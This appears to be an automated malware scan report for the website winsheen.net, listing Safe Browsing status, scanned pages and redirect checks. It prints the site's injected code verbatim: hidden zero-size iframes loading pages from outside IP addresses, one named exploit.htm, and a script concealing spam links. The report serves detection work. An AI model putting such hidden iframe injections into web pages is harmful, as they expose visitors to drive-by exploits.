Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=winsheen.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.winsheen.net/ | 200 OK Content-Length: 2470 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 222.136.82.218 ...[2312 bytes skipped]... sifu</a> <a href="/images/cs/index.html" target="_blank">chuanqishijiesifu</a> <a href="/xw/index.html" target="_blank">chuanqishijiesifu</a> <a href="/counter/CQ/index.html" target="_blank">chuanqishijiesifu</a> </div> <script>document.getElementById("winlink").style.display="none"</script> </body> </html> <iframe src=http://222.136.82.218:2/1/exploit.htm width=0 height=0></iframe><iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0></iframe><iframe src=http://173.176.20.84:2/fff/index.htm width=0 height=0></iframe><iframe src=http://173.176.20.84:2/fff/index.htm width=0 height=0></iframe> Malicious iFrame found. size: 0x0 src: http://222.136.82.218:2/1/exploit.htm This URL is marked by Google as suspicious <iframe src=http://222.136.82.218:2/1/exploit.htm width=0 height=0> Malicious iFrame found. size: 0x0 src: http://222.136.82.218:10/3/index.htm This URL is marked by Google as suspicious <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0> Hidden iFrame found. size: 0x0 src: http://173.176.20.84:2/fff/index.htm <iframe src=http://173.176.20.84:2/fff/index.htm width=0 height=0> | ||
http://www.winsheen.net/images/cs/index.html | 200 OK Content-Length: 13920 Content-Type: text/html | clean |
http://count44.51yes.com/click.aspx?id=441974869&logo=12 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://count44.51yes.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.winsheen.net/xw/index.html | 200 OK Content-Length: 14916 Content-Type: text/html | clean |
http://js.users.51.la/17350038.js | 200 OK Content-Length: 1931 Content-Type: application/x-javascript | clean |
http://www.winsheen.net/counter/CQ/index.html | 200 OK Content-Length: 6916 Content-Type: text/html | clean |
http://js.users.51.la/14677651.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: winsheen.net
Result:
GET / HTTP/1.1
Host: winsheen.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: winsheen.net
Referer: http://www.google.com/search?q=winsheen.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: winsheen.net
Referer: http://www.google.com/search?q=winsheen.net
Result:
The result is similar to the first query. There are no suspicious redirects found.